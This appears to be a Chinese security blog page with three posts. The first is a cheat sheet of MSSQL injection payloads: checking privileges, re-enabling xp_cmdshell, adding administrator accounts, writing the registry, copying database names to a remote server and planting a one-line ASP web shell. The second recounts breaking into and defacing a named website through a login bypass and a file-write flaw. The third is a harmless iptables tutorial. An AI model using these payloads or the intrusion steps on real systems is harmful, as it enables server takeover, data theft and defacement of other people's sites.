正在加载...
分页: 3/3 第一页 上页 1 2 3 最后页 [ 显示模式: 摘要 | 列表 ]

常用的一些注入命令

[ 2008/11/13 18:06 | by selboo ]
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --


数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
and user>0
' and user>0 and ''='

检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL数据库
and exists (select * from sysobjects);--

检测是否支持多行
;declare @d int;--

恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--


select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------
//      执行命令
//-----------------------
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判断xp_cmdshell扩展存储过程是否存在:
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ

读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1


数据库备份
backup database pubs to disk = 'c:\123.bak'

//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--



更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public


停掉或激活某个服务。

exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。

dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

停掉某个执行中的程序,但赋予的参数是 Process ID。
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID

xp_terminate_process 2484

xp_unpackcab

解开压缩档。

xp_unpackcab 'c:\test.cab','c:\temp',1


某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases


//在Master中创建表,看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马:
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

//更新表内容
Update films SET kind = 'Dramatic' Where id = 123

//删除内容
delete from table_name where Stockid = 3
Tags: , ,

入侵华东黑客联盟装X的过程

[ 2008/10/10 13:41 | by selboo ]
文章作者:落叶纷飞[J.L.S.T] & 云中鹰[J.L.S.T]
信息来源:安全叶子技术小组[J.Leaves Security Team](http://00day.cn)

有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量

今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程

这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来

我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东

首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的

服务器应该防ARP,不过这还只是猜测

云中鸡说先不搞C段,PZ一下再说

然后我就打开了www.3hack.com

一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............

这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell

我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT

然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn

看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟

问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............

无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~

然后阿拉伯黑客发现了www.3hack.com上有个xia的目录很可疑,于是我就去看看是什么

打开一看,

点击在新窗口中浏览此图片

我靠~~这啥东西?这么帅?点进去一看,如图2所示。

点击在新窗口中浏览此图片

太帅了,真YD!!

这个页面应该是一套个人主页程序,而且还挺炫的!

这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。

点击在新窗口中浏览此图片

嘿嘿,试着'or'='or'居然进去了!!如图4所示。

点击在新窗口中浏览此图片

经过半个多小时的摸索,还是没有发现可利用的地方。

这下郁闷了,不管了,把这套程序下载下来看看吧

找了一会才知道这套程序叫做“V时代个人flash主页”

到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用

于是马上打开http://www.3hack.com/xia/html/admin

返回的确实找不到页面,郁闷了,输入http://www.3hack.com/xia/html/

同样是找不到页面,真晕!再看看!

5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!

马上打开http://www.3hack.com/xia/asp/vshidai.mdb,我晕!服务器居然设置了mdb后缀映射,下载不了!

打开http://www.3hack.com/xia/asp/,发现返回空白,这下我真是服了!

希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:


var a
var b
var tx
var clean
a=Request("re")
clean=Request("clean")
var jian="test.txt"

if(clean==1){
tx="&a="
var fs2
var fs2=Server.CreateObject("Scripting.FileSystemObject")
var newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)
newdt.WriteLine("&a=")
newdt.close()
}

if(clean==0|clean==1){
tx=""
var fso = Server.Createobject("Scripting.FileSystemObject")
var file = fso.OpenTextFile(Server.Mappath(jian))
while (!file.AtEndOfStream){
tx=file.ReadLine()
Response.write (tx)
}
Response.write ("&")
file.close()
}

if(clean==2){
tx=""
var fso = Server.Createobject("Scripting.FileSystemObject")
var file = fso.OpenTextFile(Server.Mappath(jian))

var fs2
var fs2=Server.CreateObject("Scripting.FileSystemObject")
var newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)


while (!file.AtEndOfStream){
tx=file.ReadLine()
Response.write (tx)}

Response.write (a+"&")
newdt.WriteLine(a)

file.close()
newdt.close()
}



这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”

接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”

这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话

过程如图5、6所示。

点击在新窗口中浏览此图片

点击在新窗口中浏览此图片

提交后我们打开www.3hack.com/xia/test.txt看看,如图7所示。

点击在新窗口中浏览此图片

这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的

如果jian是经过request取值的话,同样也能搞到shell。

这次只是装到了X,并没有拿到shell

已经是凌晨了,跟云中J说了声就睡觉去鸟

估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙

就到这里吧,没技术含量,纯粹装X,高手们见笑了

另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己

自己学不到技术,却还在自欺欺人

不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~
Tags: , ,

Linux安全工具-Iptables

[ 2008/08/05 12:17 | by selboo ]
    iptables是一款状态防火墙几乎集成到所有Linux发行版中了,这就意味着你可以使用它基于ip地址的规则来控制远程机器访问你的服务器,以及连接请求的类型。(旧的无状态的防火墙让你只能根据数据包的内容来做出判断,因此你被端口号限制,不能跟踪会话的存在,如FTP数据流),Debian用户可以通过apt-get install iptables conntrack来获取它。

    当你从终端登陆到机器上时请完成你的初始化测试,用一个错误的规则将你自己锁在外面,然后你亲自恢复,当所有数据包被允许通过,因此这如果不被接受,观察iptables-save和iptables-restore命令,这里有一个加上注释的例子脚本,它非常基础,但是基本上它可以告诉你iptables是如何工作的:

#!/bin/bash
# example iptables script
# flush the old rules
iptables -F
# set the default policy of the chain to accept
iptables -P INPUT ACCEPT
# create a new table for logging and discarding
# unwanted packets
iptables -N LOGDROP
# use rate limiting on the logging, and
# add a prefix of ’filter:
iptables -A LOGDROP -m limit -j LOG --log-prefix "filter: "
# drop unwanted TCP connections with a
# TCP ReSeT packet
iptables -A LOGDROP -p tcp -j REJECT --reject-with tcp-reset
# drop other packets by sending an ICMP
# port unreachable in response
iptables -A LOGDROP -j REJECT --reject-with icmp-port-unreachable
# now drop the packet
iptables -A LOGDROP -j DROP
#allow anything on the local interface
iptables -A INPUT -i lo -j RETURN
# allow packets that are related to
# an on-going conversation
iptables -A INPUT -p tcp -m conntrack --ctstate RELATED,ESTABLISHED -j
RETURN
iptables -A INPUT -p udp -m conntrack --ctstate RELATED,ESTABLISHED -j
RETURN
# allow SSH traffic
iptables -A INPUT -p tcp -m tcp --dport 22 -j RETURN
# allow HTTP and HTTPS traffic
iptables -A INPUT -p tcp -m tcp --dport 443 -j RETURN
iptables -A INPUT -p tcp -m tcp --dport 80 -j RETURN
# accept the following ICMP types -
# echo, echo reply, source quench,
ttl exceeded,
# destination unreachable - and drop the rest
iptables -A INPUT -p icmp -m icmp --icmp-type 0 -j RETURN
iptables -A INPUT -p icmp -m icmp --icmp-type 3 -j RETURN
iptables -A INPUT -p icmp -m icmp --icmp-type 4 -j RETURN
iptables -A INPUT -p icmp -m icmp --icmp-type 8 -j RETURN
iptables -A INPUT -p icmp -m icmp --icmp-type 11 -j RETURN
# if we haven’t accepted it, drop and log it.
iptables -A INPUT -j LOGDROP

    如果你正在疑惑日志在哪里,象什么样子,这里有一个例子,来自系统日志/var/log/messages,一个来自192.168.50.40的UDP数据包,源端口30766,目标服务器是192.168.0.8,目标端口是1026,这个数据包被丢掉了,它可能是windows机器上了信使服务发出的垃圾信息:

Nov 22 06:24:00 localhost kernel: filter: IN=eth0
OUT=MAC=00:0a:e6:4e:6d:49:00:14:6c:67:cc:9a:08:00
SRC=192.168.50.40 DST=192.168.0.8 LEN=402
TOS=0x00 PREC=0x00 TTL=47 ID=3345 PROTO=UDP
SPT=30766 DPT=1026 LEN=382

    日志输出看起来有点恐怖,但是你能容易地拣出你想要的信息,首先,你看到的是日期和主机名,IN和OUT描述了数据包是来自哪个端口和通过哪个端口出去的,MAC给出了源和目标MAC地址,SRC和DST是源和目标ip地址,PROTO是UDP,TCP,ICMP等等,SPT和DPT是源和目标端口号,例如:大部分到服务的连接如ssh都有一个临时的源端口,如35214,和一个目标端口22,那么象前面说道的windows机器的信使服务数据包,你可以安全地忽略它。

    当你安装号防火墙后,务必再从另外一台机器上运行一次nmap,来检查是否只打开了正确的端口。

总结

    安全是不断提高、评估你的保护尺度的一个循环过程,上面的工具允许你保护你的服务器,确保它按需要进行工作,分析意外事件的网络通讯,记住,意外总是让人不愉快的!正如Larry Niven说的:“你不理解的任何事情都是危险的除非你理解了它”。

    当你正在使用这些工具时,尝试思考安全的3个步骤:预防,检查和响应。如果可能你最好预防事情的发生,发生入侵后清除的代价是昂贵的,并且你可能丢失掉有用的数据,无论如何,你将理解一些入侵的知识,因此尽你所能做好预防工作。

TCP 3次握手

    UDP是一个无连接的协议,相反,TCP在传输失败时会重新再发送一次数据,它的设置比UDP更复杂,以3次握手开始,初始化一个连接,客户端发送一个SYN(开始同步)数据包,服务器然后用一个SYN+ACK数据包进行响应(如果端口是打开的情况下),然后客户端响应一个ACK(告知收到)数据包,连接就这样建立了,这些数据包携带数据序列号,它允许协议检查和重新发送丢失的数据包,如果端口是关闭的或被防火墙过滤了,响应可能是RST或没有响应,更多信息可以查看nmap文档。
分页: 3/3 第一页 上页 1 2 3 最后页 [ 显示模式: 摘要 | 列表 ]